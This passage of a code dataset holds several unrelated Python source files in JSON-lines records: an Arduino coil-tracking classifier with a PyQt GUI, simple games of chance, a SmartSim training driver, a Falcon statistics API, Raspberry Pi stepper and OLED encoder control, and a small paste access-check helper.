f.read()#[1:-1]\n data = data[1:-1]\n data = [float(s) for s in data.split(',')]\n X.append(data)\n f.close()\n os.chdir(os.getcwd()+'\\\\..\\\\data270')\n for path, subdir, files in os.walk('.'):\n for directory in subdir: \n for file in os.listdir(os.getcwd() + '\\\\'+directory):\n y.append(directory)\n #print(directory)\n filename = os.getcwd()+ '\\\\'+directory + '\\\\' + file\n f = open(filename, 'r')\n data = f.read()#[1:-1]\n data = data[1:-1]\n data = [float(s) for s in data.split(',')]\n X.append(data)\n f.close()\n \"\"\"\n except Exception as exc:\n print(exc)\n #print(y)\n #print(X)\n os.chdir(os.getcwd()+'\\\\..')\n print(os.getcwd())\n dataFile = 'features0.py'\n fileObj = open(dataFile, 'w')\n fileObj.write('X = ' + pprint.pformat(X)+ '\\n')\n fileObj.write('y = ' + pprint.pformat(y)+ '\\n')\n fileObj.close()\n #print(len(X), len(y))\n\ndef trainClassifier():\n from sklearn.tree import DecisionTreeClassifier\n from sklearn.neighbors import KNeighborsClassifier\n from sklearn.svm import SVC, SVR\n from sklearn.ensemble import VotingClassifier\n from itertools import product\n from sklearn.cross_validation import train_test_split\n from sklearn.ensemble import RandomForestClassifier\n\n #This is whatever you saved your X and y data into\n import featuresALL\n\n X = np.array(features0.X)\n y = np.array(features0.y)\n\n testSize = .3\n randomState=1\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=testSize, random_state=randomState)\n\n #Classification\n clf0 = svm.SVC(kernel='linear')\n clf1 = DecisionTreeClassifier(max_depth=4)\n clf2 = KNeighborsClassifier(n_neighbors=7)\n clf3 = SVC(kernel='rbf', probability=True)\n eclf = VotingClassifier(estimators=[('dt', clf1), ('knn', clf2),\n ('svc', clf3)],\n voting='soft', weights=[2, 1, 2])\n\n #Regression\n svrRbf = SVR(kernel='rbf', C=1e3, gamma=0.1)\n scrLin = SVR(kernel='linear', C=1e3)\n svrPoly = SVR(kernel='poly', C=1e3, degree=2)\n \n \n clf0.fit(X_train,y_train)\n clf1.fit(X_train,y_train)\n clf2.fit(X_train,y_train)\n clf3.fit(X_train,y_train)\n eclf.fit(X_train,y_train)\n\n #svrRbf.fit(X_train,y_train)\n #svrLin.fit(X_train,y_train)\n #svrPoly.fit(X_train,y_train)\n\n #store classifier\n #s = pickle.dumps(clf0)\n joblib.dump(clf0, 'svm-SVC0deg.pkl')\n \n estimatorName=['linear SVC', 'Decision Tree', 'K Neighbors',\n 'rbf Kernel SVC', 'Voting Classifier', 'SVR-RBF',\n 'SVR-Lin', 'SVR-Poly']\n predictions=[]\n predictions.append(clf0.predict(X_test))\n predictions.append(clf1.predict(X_test))\n predictions.append(clf2.predict(X_test))\n predictions.append(clf3.predict(X_test))\n predictions.append(eclf.predict(X_test))\n \n #predictions.append(svrRbf.predict(X_test))\n #predictions.append(svrLin.predict(X_test))\n #predictions.append(svrPoly.predict(X_test))\n \n for i in range(len(predictions)):\n\n pprint.pprint(estimatorName[i])\n pprint.pprint('Predictions:'), pprint.pprint(np.array(predictions[i]))\n pprint.pprint('Ground Truth:'), pprint.pprint(np.array(y_test))\n \n predVsTruth=predictions[i]==y_test \n pprint.pprint(predVsTruth)\n numCases =(len(predictions[i]))\n numTrue = np.sum(predVsTruth)\n numFalse = numCases - numTrue\n print('Accuracy is: \"%s\"' % (numTrue/numCases*100))\n print('Number True: \"%s\", Number False: \"%s\"\\n\\n' % (numTrue,numFalse))\n\n \"\"\"#Must download Graphviz.exe and pip install graphviz for this to work\n #Gives a tree representation of the decision tree decision parameters. \n os.environ[\"PATH\"] += os.pathsep + 'C:\\\\Program Files (x86)\\\\Graphviz2.38\\\\bin\\\\'\n dot_data = tree.export_graphviz(clf1, out_file=None) \n graph = pydotplus.graph_from_dot_data(dot_data) \n graph.write_pdf(\"carClassifier.pdf\") \n\n #The graphing portion of this is not working 100% currently\n feat_labels = ['m','sf','mx','mi','sdev','amin','smin','stmin','apeak','speak','stpeak','acep','scep','stcep','aacep','sscep','stsscep','zcc','zccn','spread','skewness','savss','mavss']\n\n forest = RandomForestClassifier(n_estimators=10000,random_state=0,n_jobs=1)\n forest.fit(X_train,y_train)\n importances = forest.feature_importances_\n\n indices = np.argsort(importances)[::-1]\n\n for f in range(X_train.shape[1]):\n print(\"%2d) %-*s %f\" % (f + 1, 30, \n feat_labels[indices[f]], \n importances[indices[f]]))\n\n plt.title('Feature Importances')\n plt.bar(range(X_train.shape[1]), \n importances[indices],\n color='lightblue', \n align='center')\n for f in range(X_train.shape[1]):\n plt.xticks(range(X_train.shape[1]), \n feat_labels[indices], rotation=90)\n plt.xlim([-1, X_train.shape[1]])\n plt.tight_layout()\n #plt.savefig('./random_forest.png', dpi=300)\n plt.show()\n \"\"\"\n\n\ndef collectData():\n try:\n path = 'C:\\\\Users\\\\Sara Srivastav\\\\Documents\\\\senior design\\\\3Dtracking\\\\python\\\\data'\\\n #path = 'C:\\\\Users\\\\Gersemi\\\\Desktop\\\\Github\\\\3Dtracking\\\\data\\\\'\n #ser = Serial.serial\n \n numsamples = 100\n coil1arr=[]\n coil2arr=[]\n coil3arr=[]\n coil4arr=[]\n o = '90'\n x = '1'\n y = '1'\n z = '5'\n \n dataFolder = path + \"\\\\cord_%s_%s_%s_%s\" % (o, x, y, z)\n if not os.path.exists(dataFolder):\n os.makedirs(dataFolder)\n \n for i in range(numsamples):\n dataFile = \"%s.txt\" % (datetime.utcnow().strftime('%Y%m%d_%H%M%S%f')[:-3])\n for i in range(10):\n reading = ard.readline().decode(\"utf-8\")\n if 'coil1' in reading:\n coil1 = reading\n coil1arr.append(float(coil1[5:]))\n #print(coil1)\n elif 'coil2' in reading:\n coil2 = reading\n coil2arr.append(float(coil2[5:]))\n #print(coil2)\n elif 'coil3' in reading:\n coil3 = reading\n coil3arr.append(float(coil3[5:]))\n #print(coil3)\n elif 'coil4' in reading:\n coil4 = reading\n coil4arr.append(float(coil4[5:]))\n #print(coil4)\n #print('1: \"%s\", 2: \"%s\", 3: \"%s\", 4: \"%s\"' % (coil1, coil2, coil3, coil4))\n\n #print(coil1arr,coil2arr,coil3arr,coil4arr) \n featuresC1 = get_indicators(coil1arr)\n featuresC2 = get_indicators(coil2arr)\n featuresC3 = get_indicators(coil3arr)\n featuresC4 = get_indicators(coil4arr)\n print(\"C1: \")\n print(featuresC1)\n print(\"C2: \")\n print(featuresC2)\n print(\"C3: \")\n print(featuresC3)\n print(\"C4: \")\n print(featuresC4)\n features = []\n features.extend(featuresC1)\n features.extend(featuresC2)\n features.extend(featuresC3)\n features.extend(featuresC4)\n #print(features)\n f = open(dataFolder + \"\\\\\"+ dataFile, 'w')\n f.write(str(features))\n f.close()\n f = open(path + \"\\\\signal_cord_%s_%s_%s_%s_\" % (o,x, y, z) + dataFile, 'w')\n f.write(str(coil1arr))\n f.write(str(coil2arr))\n f.write(str(coil3arr))\n f.write(str(coil4arr))\n f.close()\n except Exception as exc:\n print(exc)\n ard.close()\n\n print('done') \n\ndef get_indicators(vec):\n '''\n Source: https://github.com/VikParuchuri/simpsons-scripts\n '''\n mean = np.mean(vec)\n slope = calc_slope(np.arange(len(vec)),vec)\n #std = np.std(vec)\n mx = np.max(vec)\n mi = np.min(vec)\n sdev = np.std(vec)\n return [mean, slope, mx, mi, sdev]\n\ndef calc_slope(x,y):\n '''\n Source: https://github.com/VikParuchuri/simpsons-scripts\n '''\n x_mean = np.mean(x)\n y_mean = np.mean(y)\n x_dev = np.sum(np.abs(np.subtract(x,x_mean)))\n y_dev = np.sum(np.abs(np.subtract(y,y_mean)))\n\n slope = (x_dev*y_dev)/(x_dev*x_dev)\n return slope\n\ndef connectArduino():\n if ard.is_open:\n ard.close()\n arduinoPorts = [\n p.device\n for p in serial.tools.list_ports.comports()\n if 'USB-SERIAL CH340' in p.description\n ]\n if not arduinoPorts:\n raise IOError(\"No Arduino found\")\n if len(arduinoPorts) > 1:\n warnings.warn('Multiple Arduinos found - using the first')\n ard.port = arduinoPorts[0]\n ard.open()\n\ndef printCoilDataTagged():\n try:\n connectArduino()\n while True:\n reading = list(ard.readline())\n print(reading)\n tag = reading[0:4]\n value = reading[5:]\n print('\"%s\": \"%s\"' % (tag, reading))\n \n except Exception as exc:\n print('Exception: \"%s\"' % exc)\n\ndef printCoilData():\n try:\n\n connectArduino()\n while True:\n for i in range(4):\n reading = ard.readline()\n coilReading = reading.replace('coil'+str(i), '')\n print('Coil\"%s\" reading: \"%s\"' % (i,float(coilReading)))\n\n except Exception as exc:\n print('Exception: \"%s\"' % exc)\n\nclass TrackingGui(QWidget):\n\n def __init__(self):\n super().__init__()\n\n #Coordinate box setup\n xlabel = QLabel('X:', self) \n xlabel.setMaximumWidth(40)\n ylabel = QLabel('Y:', self) \n ylabel.setMaximumWidth(40)\n zlabel = QLabel('Z:', self)\n zlabel.setMaximumWidth(40)\n\n self.xline = QLineEdit('')\n self.xline.setReadOnly(True)\n self.yline = QLineEdit('')\n self.yline.setReadOnly(True)\n self.zline = QLineEdit('')\n self.zline.setReadOnly(True)\n \n #Plot setup\n # a figure instance to plot on\n self.figure = Figure()\n\n # this is the Canvas Widget that displays the `figure`\n # it takes the `figure` instance as a parameter to __init__\n self.canvas = FigureCanvas(self.figure)\n #self.fig = plt.figure()\n self.ax = self.figure.add_subplot(111, projection='3d')\n \n #Placing objects onto the GUI\n grid = QGridLayout()\n grid.setSpacing(10)\n\n grid.addWidget(xlabel, 0, 0)\n grid.addWidget(self.xline, 0, 1)\n\n grid.addWidget(ylabel, 1, 0)\n grid.addWidget(self.yline, 1, 1)\n \n grid.addWidget(zlabel, 2, 0)\n grid.addWidget(self.zline, 2, 1)\n \n grid.columnStretch(0)\n\n vbox = QVBoxLayout()\n vbox.addWidget(self.canvas)\n vbox.addStretch(1)\n\n hbox = QHBoxLayout()\n hbox.addLayout(grid, 0)\n hbox.addLayout(vbox, 1)\n\n self.setLayout(hbox)\n self.setGeometry(1000, 700, 1000, 700)\n self.setWindowTitle('3D Tracking GUI')\n self.center()\n self.show()\n\n timer = QTimer(self)\n timer.timeout.connect(self.updatePlot)\n timer.start(20)\n \n def updatePlot(self):\n try:\n ''' plot some random stuff '''\n #x, y, z = classifyData()\n cord = classifyData()\n x = cord[0]\n y = cord[1]\n z = cord[2]\n #x = random.uniform(0.0,30.0)\n #y = random.uniform(0.0,20.0)\n #z = random.uniform(0.0,10.0)\n \n self.xline.setText(str(round(x,2))+' cm')\n self.yline.setText(str(round(y,2))+' cm')\n self.zline.setText(str(round(z,2))+' cm')\n \n # create an axis\n #ax = self.figure.add_subplot(111, projection='3d')\n\n # discards the old graph\n self.ax.clear()\n\n # plot data\n self.ax.set_xlim(0, 30, 5)\n #self.ax.set_ylim(0, 20, 5)\n self.ax.set_ylim(0, 30, 5)\n self.ax.set_zlim(0, 10, 2)\n self.ax.scatter(x, y, z, 'gray')\n\n # refresh canvas\n self.canvas.draw()\n except Exception as exc:\n print('Exception: \"%s\"' % exc)\n \n def center(self):\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\ndef classifyData():\n try:\n coil1arr=[]\n coil2arr=[]\n coil3arr=[]\n coil4arr=[]\n numsamples = 100 \n for i in range(numsamples):\n reading = ard.readline().decode(\"utf-8\")\n if 'coil1' in reading:\n coil1 = reading\n coil1arr.append(float(coil1[5:]))\n #print(\"coil1\")\n #print(coil1)\n elif 'coil2' in reading:\n coil2 = reading\n coil2arr.append(float(coil2[5:]))\n #print(\"coil2\")\n #print(coil2)\n elif 'coil3' in reading:\n coil3 = reading\n coil3arr.append(float(coil3[5:]))\n #print(\"coil3\")\n #print(coil3)\n elif 'coil4' in reading:\n coil4 = reading\n coil4arr.append(float(coil4[5:]))\n #print(\"coil4\")\n #print(coil4)\n #print('1: \"%s\", 2: \"%s\", 3: \"%s\", 4: \"%s\"' % (coil1, coil2, coil3, coil4))\n #print(coil1arr,coil2arr,coil3arr,coil4arr)\n \n featuresC1 = get_indicators(coil1arr)\n print(\"coil1\")\n print(featuresC1)\n featuresC2 = get_indicators(coil2arr)\n print(\"coil2\")\n print(featuresC2)\n featuresC3 = get_indicators(coil3arr)\n print(\"coil3\")\n print(featuresC3)\n featuresC4 = get_indicators(coil4arr)\n print(\"coil4\")\n print(featuresC4)\n features = []\n features.extend(featuresC1)\n features.extend(featuresC2)\n features.extend(featuresC3)\n features.extend(featuresC4)\n\n \"\"\" \n prediction = clf0.predict([feature])\n \n coordinates = prediction[0].split(\"_\")\n orien = coordinates[1]\n x = int(coordinates[2])\n y = int(coordinates[3])\n z = int(coordinates[4])\n return [x,y,z]\n print((\"x:%s, y:%s, z:%s\") % (x,y,z))\n \"\"\" \n \n except Exception as exc:\n print('Exception: \"%s\"' % exc)\n\nclf0 = joblib.load('svm-SVCALL.pkl')\nclf1 = joblib.load('svm-SVC0deg.pkl')\nclf2 = joblib.load('svm-SVC0-90deg.pkl')\nif __name__ == '__main__':\n \n try:\n try:\n connectArduino()\n except:\n print('No Arduino')\n #collectData()\n #standarizeData()\n #trainClassifier()\n classifyData()\n #app = QApplication(sys.argv)\n #ex = TrackingGui()\n #sys.exit(app.exec_())\n except KeyboardInterrupt:\n pass\n","sub_path":"python/copydoeverything.py","file_name":"copydoeverything.py","file_ext":"py","file_size_in_byte":17763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"2927749","text":"import random\n\nmoney = 100\n\n#Write your game of chance functions here\n\n#Flips coin and returns winnings or losses\ndef coin_flip(guess, bet):\n print('Flipping a coin...\\n')\n one_or_two = random.randint(1, 2)\n \n if one_or_two == 1:\n coin = 'Heads'\n elif one_or_two == 2:\n coin = 'Tails'\n \n print(f'You called {guess} and bet £{str(bet)}...\\n')\n print(f'The coin landed on {coin}.\\n')\n \n if guess == coin:\n print(f'You won £{str(bet)}!\\n')\n return bet\n else:\n print(f'You lost £{str(bet)}.\\n')\n return -bet\n \n \n#Rolls two dice and lets player guess if total is odd or even\ndef cho_han(guess, bet):\n print('Rolling two dice...\\n')\n roll_one = random.randint(1, 6)\n print(f'The first dice rolled a {str(roll_one)}\\n')\n roll_two = random.randint(1, 6)\n print(f'The second dice rolled a {str(roll_two)}\\n')\n total = roll_one + roll_two\n \n if total % 2 == 0:\n result = 'Even'\n else:\n result = 'Odd'\n \n print(f'You guessed {guess} and bet £{str(bet)}...\\n')\n print(f'The dice totaled {str(total)}, an {result} number!\\n')\n \n if guess == result:\n print(f'You won £{str(bet)}!\\n')\n return bet\n else:\n print(f'You lost £{str(bet)}.\\n')\n return -bet\n \n#Simulates two cards being drawn from a deck, highest wins\ndef two_card_draw(bet):\n print('Drawing two cards...\\n')\n print(f'You bet £{str(bet)}...\\n')\n deck = []\n for i in range(2, 15):\n deck.append(i)\n deck.append(i)\n deck.append(i)\n deck.append(i)\n \n player_card_num = deck[random.randint(0, 51)]\n deck.remove(player_card_num)\n opponent_card_num = deck[random.randint(0, 50)]\n \n player_card = card_number_to_name(player_card_num)\n opponent_card = card_number_to_name(opponent_card_num)\n \n print(f'You drew a(n) {str(player_card)}\\n')\n print(f'Your opponent drew a(n) {str(opponent_card)}\\n')\n \n if player_card_num == opponent_card_num:\n print('It\\'s a draw!\\n')\n return 0\n elif player_card_num > opponent_card_num:\n print(f'You won £{str(bet)}!\\n')\n return bet\n else:\n print(f'You lost £{str(bet)}.\\n')\n return -bet\n \n#Converts number to picture card name for card draw game\ndef card_number_to_name(card_number):\n if card_number == 14:\n return 'Ace'\n elif card_number == 11:\n return 'Jack'\n elif card_number == 12:\n return 'Queen'\n elif card_number == 13:\n return 'King'\n else:\n return card_number\n \n#Roulette - guess a number or odd/even and returns winnings/losses\ndef roulette(guess, bet):\n print('Spinning the roulette wheel...\\n')\n result = random.randint(0, 36)\n \n if result % 2 == 0:\n odd_or_even = 'Even'\n else:\n odd_or_even = 'Odd'\n \n print('The wheel is spinning...\\n')\n print(f'It landed on a {str(result)}!\\n')\n \n if guess == 'Odd' or guess == 'Even':\n print(f'You guessed {guess} and bet £{str(bet)}...\\n')\n if guess == odd_or_even:\n print(f'You won £{str(bet)}!\\n')\n return bet\n else:\n print(f'You lost £{str(bet)}.\\n')\n return -bet\n else:\n print(f'You guessed {str(guess)} and bet £{str(bet)}...\\n')\n if guess == result:\n print(f'You won £{str(bet * 35)}!\\n')\n return bet * 35\n else:\n print(f'You lost £{str(bet)}.\\n')\n return -bet\n \n \n \n \n#Call your game of chance functions here\n\nmoney += coin_flip('Heads', 10)\n\nprint(f'£{money} left\\n')\n\nmoney += cho_han('Odd', 20)\n\nprint(f'£{money} left\\n')\n\nmoney += two_card_draw(15)\n\nprint(f'£{money} left\\n')\n\nmoney += roulette(7, 10)\n\nprint(f'£{money} left\\n')\n\nmoney += roulette('Odd', 30)\n\nprint(f'£{money} left\\n')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"games-of-chance/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"562421529","text":"# general imports\nimport os\nimport sys\n\n# smartsim and smartredis imports\nfrom smartsim import Experiment\nfrom smartsim.settings import MpiexecSettings\n\n# Define function to parse node list\ndef parseNodeList(fname):\n with open(fname) as file:\n nodelist = file.readlines()\n nodelist = [line.rstrip() for line in nodelist]\n nodelist = [line.split('.')[0] for line in nodelist]\n nNodes = len(nodelist)\n return nodelist, nNodes\n\n# Parse command line arguments\nnodes = int(sys.argv[1])\ndb_nNodes = int(sys.argv[2])\nsim_nNodes = int(sys.argv[3])\nml_nNodes = int(sys.argv[4])\nppn = int(sys.argv[5])\nsimprocs = int(sys.argv[6])\nsimprocs_pn = int(sys.argv[7])\nmlprocs = int(sys.argv[8])\nmlprocs_pn = int(sys.argv[9])\ndevice = sys.argv[10]\nlogging = sys.argv[11]\nhostfile = sys.argv[12]\n\n# Get nodes of this allocation (job) and split them between the tasks\nnodelist, nNodes = parseNodeList(hostfile)\nprint(f\"\\nRunning on {nNodes} total nodes on Polaris\")\nprint(nodelist, \"\\n\")\ndbNodes = ','.join(nodelist[0: db_nNodes])\ndbNodes_list = nodelist[0: db_nNodes]\nsimNodes = ','.join(nodelist[db_nNodes: db_nNodes + sim_nNodes])\nmlNodes = ','.join(nodelist[db_nNodes + sim_nNodes: db_nNodes + sim_nNodes + ml_nNodes])\nprint(f\"Database running on {db_nNodes} nodes:\")\nprint(dbNodes)\nprint(f\"Simulatiom running on {sim_nNodes} nodes:\")\nprint(simNodes)\nprint(f\"ML running on {ml_nNodes} nodes:\")\nprint(mlNodes, \"\\n\")\n\n# Set up database and start it\nPORT = 6780\nexp = Experiment(\"train-example\", launcher=\"pbs\")\nrunArgs = {\"np\": 1, \"ppn\": ppn, \n #\"hosts\": dbNodes\n }\ndb = exp.create_database(port=PORT, batch=False, db_nodes=db_nNodes,\n run_command='mpiexec',\n interface='hsn0', \n hosts=dbNodes_list,\n run_args=runArgs,\n single_cmd=False\n )\nexp.generate(db)\nprint(\"Starting database ...\")\nexp.start(db)\nprint(\"Done\\n\")\n\n# Python data producer\nprint(\"Launching Python data producer ...\")\nPy_exe = 'src/load_data.py'\nif (simprocs_pn>ppn):\n simprocs_pn = ppn\nexe_args = Py_exe + f' --dbnodes {db_nNodes} --ppn {simprocs_pn} --logging {logging}'\nrunArgs = {\"np\": simprocs, \"ppn\": simprocs_pn, \n \"hosts\": simNodes\n }\nrun_settings = MpiexecSettings('python',\n exe_args=exe_args, \n run_args=runArgs\n )\nsim_exp = exp.create_model(\"load_data\", run_settings)\nexp.start(sim_exp, summary=True, block=False)\nprint(\"Done\\n\")\n\n# Python data consumer\nprint(\"Launching Pyhton data consumer ...\")\nml_exe = \"src/trainPar.py\"\nif (mlprocs_pn>ppn):\n mlprocs_pn = ppn\nexe_args = ml_exe + f' --dbnodes {db_nNodes} --device {device} --ppn {mlprocs_pn} --logging {logging}'\nrunArgs = {\"np\": mlprocs, \"ppn\": mlprocs_pn, \n \"hosts\": mlNodes\n }\nrunML_settings = MpiexecSettings('python',\n exe_args=exe_args, \n run_args=runArgs\n )\nml_exp = exp.create_model(\"train_model\", runML_settings)\nexp.start(ml_exp, summary=True, block=True)\nprint(\"Done\\n\")\n\n# Stop database\nprint(\"Stopping the Orchestrator ...\")\nexp.stop(db)\nprint(\"Done\")\nprint(\"Quitting\")\n\n","sub_path":"couplingSimulationML/SmartSim/Polaris/Python/train_clDB/src/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"646538962","text":"from io import BytesIO\nimport json\n\nimport falcon\nimport peewee\nimport unicodecsv as csv\n\nfrom playhouse.shortcuts import model_to_dict, cast\n\nfrom models import models_api\nfrom models import models_stats\nfrom utils.myjson import JSONEncoderPlus\n\n\nclass StatsItem(object):\n\n @models_stats.database.atomic()\n def on_get(self, req, resp, datatype=None):\n\n if datatype == '0':\n\n stats = models_stats.Sumario.select().first()\n\n response = model_to_dict(stats)\n\n resp.body = json.dumps(response, cls=JSONEncoderPlus, sort_keys=True)\n\n elif datatype == '1':\n\n gasto_organismos = models_stats.MinisterioOrganismoMonto.select(\n models_stats.MinisterioOrganismoMonto.nombre_ministerio.concat('-').concat(models_stats.MinisterioOrganismoMonto.nombre_organismo).alias('nombre'),\n cast(models_stats.MinisterioOrganismoMonto.monto, 'bigint').alias('monto')\n ).order_by(\n peewee.SQL('nombre')\n )\n\n output = BytesIO()\n csvwriter = csv.writer(output, encoding='utf-8')\n\n for go in gasto_organismos.tuples():\n csvwriter.writerow(go if len(go) == 4 else go+('null', 'null'))\n\n resp.content_type = 'text/csv'\n output.seek(0)\n resp.stream = output\n\n else:\n raise falcon.HTTPNotFound()\n\n\nclass StatsTop(object):\n\n @models_api.database.atomic()\n def on_get(self, req, resp, datatype=None):\n\n if datatype in ['licitacion', 'licitaciones']:\n\n licitaciones = models_api.LicitacionesCategorias.select().order_by(models_api.LicitacionesCategorias.monto.desc())\n\n response = {\n 'licitaciones': [\n {\n 'id': licitacion['licitacion'],\n 'codigo': licitacion['codigo_licitacion'],\n 'nombre': licitacion['nombre_licitacion'],\n 'monto': int(licitacion['monto'])\n }\n for licitacion in licitaciones.dicts().iterator()]\n }\n\n resp.body = json.dumps(response, cls=JSONEncoderPlus)\n\n elif datatype in ['organismo', 'organismos']:\n\n organismos = models_api.RankingOrganismos.select().order_by(models_api.RankingOrganismos.monto.desc())\n\n response = {\n 'organismos': [\n {\n 'id': organismo['organismo'],\n 'nombre': organismo['nombre_organismo'],\n 'monto': int(organismo['monto'])\n }\n for organismo in organismos.dicts().iterator()]\n }\n\n resp.body = json.dumps(response, cls=JSONEncoderPlus)\n\n elif datatype in ['proveedor', 'proveedores']:\n\n proveedores = models_api.RankingProveedores.select().order_by(models_api.RankingProveedores.monto.desc())\n\n response = {\n 'proveedores': [\n {\n 'id': proveedor['empresa'],\n 'nombre': proveedor['nombre_empresa'],\n 'rut': proveedor['rut_sucursal'],\n 'monto': int(proveedor['monto'])\n }\n for proveedor in proveedores.dicts().iterator()]\n }\n\n resp.body = json.dumps(response, cls=JSONEncoderPlus)\n\n elif datatype in ['categoria', 'categorias']:\n\n categorias = models_api.RankingCategorias.select().order_by(models_api.RankingCategorias.monto.desc())\n\n response = {\n 'categorias': [\n {\n 'id': categoria['id_categoria_nivel3'],\n 'nombre': categoria['categoria_nivel3'],\n 'monto': int(categoria['monto'])\n }\n for categoria in categorias.dicts().iterator()]\n }\n\n resp.body = json.dumps(response, cls=JSONEncoderPlus)\n","sub_path":"endpoints/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"15653314","text":"import Adafruit_SSD1306\nfrom PIL import Image, ImageDraw, ImageFont\nimport RPi.GPIO as GPIO\nfrom time import sleep\n\nclk = 17 #Encoder clk pin\ndt = 18 #Encoder dt pin\nsw=6 #Encoder Switch/Select\nDIR = 21 # Direction GPIO Pin\nSTEP = 20 # Step GPIO Pin\nCW = 1 # Clockwise Rotation\nCCW = 0 # Counterclockwise Rotation\nSPR = 200 # Steps per Revolution (360 / 7.5)\n\n\n\npaused=False\npart=\"Wrist\"\n\n#Initalizing GPIO's of Encoder\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(clk, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(dt, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\nGPIO.setup(sw,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\n\n#Initalizing GPIO's of Stepper\nGPIO.setwarnings(False)\nGPIO.setup(DIR, GPIO.OUT)\nGPIO.setup(STEP, GPIO.OUT)\nGPIO.output(DIR, CW)\n\n#Initializing Microstep Mode pins and Table\nMODE = (26, 19, 13) # Microstep Resolution GPIO Pins\nGPIO.setup(MODE, GPIO.OUT)\nRESOLUTION = {'Full': (0, 0, 0),\n 'Half': (1, 0, 0),\n '1/4': (0, 1, 0),\n '1/8': (1, 1, 0),\n '1/16': (0, 0, 1),\n '1/32': (1, 1, 1)}\nGPIO.output(MODE, RESOLUTION['1/8'])\nstep_count = SPR*400 #How long loop should last\ndelay = .0208/2000 #350 is the fastest\n\n#Encoder check states\ncounter=0\nclkLastState = GPIO.input(clk)\ndtLastState=GPIO.input(dt)\nswLastState=GPIO.input(sw)\n\n\n#home screen of OLED display\ndisplay = Adafruit_SSD1306.SSD1306_128_64(rst=None)\ndisplay.begin()\ndisplay.clear()\ndisplay.display()\ndisplayWidth=display.width\ndisplayHeight=display.height\nimage=Image.new('1',(displayWidth,displayHeight))\ndraw=ImageDraw.Draw(image)\nfont=ImageFont.load_default()\ndisplay.clear()\ndisplay.display()\nconverted_count=str(counter)\ndraw.text((0,0),\"Welcome to 5ARA \\n Created by: \\n Nicholas Ruiz \\n Brent Holzhauer \\n Mathew Olajide\",font=font,fill=255)\ndisplay.image(image)\ndisplay.display()\n\ndef clockwise(stepper,speed,loop):\n for x in range(speed):\n GPIO.output(stepper,GPIO.HIGH)\n sleep(loop)\n GPIO.output(stepper,GPIO.LOW)\n sleep(loop)\n return\n#interrupt for + counting \ndef clkClicked(channel):\n global counter\n clkState=GPIO.input(clk)\n dtState = GPIO.input(dt)\n \n if clkState ==0 and dtState ==1:\n counter +=1\n print(counter)\n display.begin()\n display.clear()\n display.display()\n displayWidth=display.width\n displayHeight=display.height\n image=Image.new('1',(displayWidth,displayHeight))\n draw=ImageDraw.Draw(image)\n font=ImageFont.load_default()\n converted_count=str(counter)\n draw.text((0,0),\"Selected Stepper #\" + converted_count,font=font,fill=255)\n draw.text((0,10),\"RPM \\n\" + converted_count,font=font,fill=255)\n display.image(image)\n display.display()\n \n#interrupt for -counter \ndef dtClicked(channel):\n global counter\n \n clkState =GPIO.input(clk)\n dtState=GPIO.input(dt)\n if clkState ==1 and dtState ==0:\n counter -=1\n print(counter)\n display.begin()\n display.clear()\n display.display()\n displayWidth=display.width\n displayHeight=display.height\n image=Image.new('1',(displayWidth,displayHeight))\n draw=ImageDraw.Draw(image)\n font=ImageFont.load_default()\n converted_count=str(counter)\n draw.text((0,0),\"Selected Stepper #\" + converted_count,font=font,fill=255)\n draw.text((0,10),\"RPM \\n\" + converted_count,font=font,fill=255)\n display.image(image)\n display.display()\n\n#interrupt for selected button \ndef swClicked(channel):\n global paused\n paused = not paused\n convert_paused=str(paused)\n print(paused)\n display.begin()\n display.clear()\n display.display()\n displayWidth=display.width\n displayHeight=display.height\n image=Image.new('1',(displayWidth,displayHeight))\n draw=ImageDraw.Draw(image)\n font=ImageFont.load_default()\n converted_count=str(counter)\n draw.text((0,0),\"Selected Stepper #\" + converted_count,font=font,fill=255)\n draw.text((0,10),\"RPM:\" + converted_count,font=font,fill=255)\n draw.text((0,30),\"Beginning Arm Movement \\n\" + part,font=font,fill=255)\n display.image(image)\n display.display()\n if (counter == 3):\n clockwise(20,10000000,.0208/2000)\n if (counter == 6):\n clockwise(20,1000000, .0208/2000)\n\n#call interrupts with certain delay \nGPIO.add_event_detect(clk,GPIO.FALLING,callback=clkClicked,bouncetime=100)\nGPIO.add_event_detect(dt,GPIO.FALLING,callback=dtClicked,bouncetime=100)\nGPIO.add_event_detect(sw,GPIO.FALLING,callback=swClicked,bouncetime=100)\n\n#send to command line \nraw_input(\"Welcome to 5ARA \\n\")\n\n#if statement that intializes movement based on counter\nraw_input(counter)\n\n\n\n \n\n","sub_path":"Adafruit_Python_SSD1306/examples/encoderinterruptwithswitch.py","file_name":"encoderinterruptwithswitch.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"311236787","text":"def is_paste_owner(request, paste):\n\tif paste.identifier not in request.session.get(\"pastes\", []) and paste.user != request.user:\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef is_paste_reader(request, paste, key):\n\tif is_paste_owner(request, paste):\n\t\treturn True\n\ttry:\n\t\tacl = paste.pasteacl_set.get(identifier=key)\n\texcept:\n\t\treturn False\n\tif acl.is_expired:\n\t\treturn False\n\tif acl.ip:\n\t\tif acl.ip != request.META.get(\"REMOTE_ADDR\"):\n\t\t\treturn False\n\telse:\n\t\tacl.ip = request.META.get(\"REMOTE_ADDR\")\n\t\tacl.save()\n\treturn True","sub_path":"light/api/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"179294574","text":"import 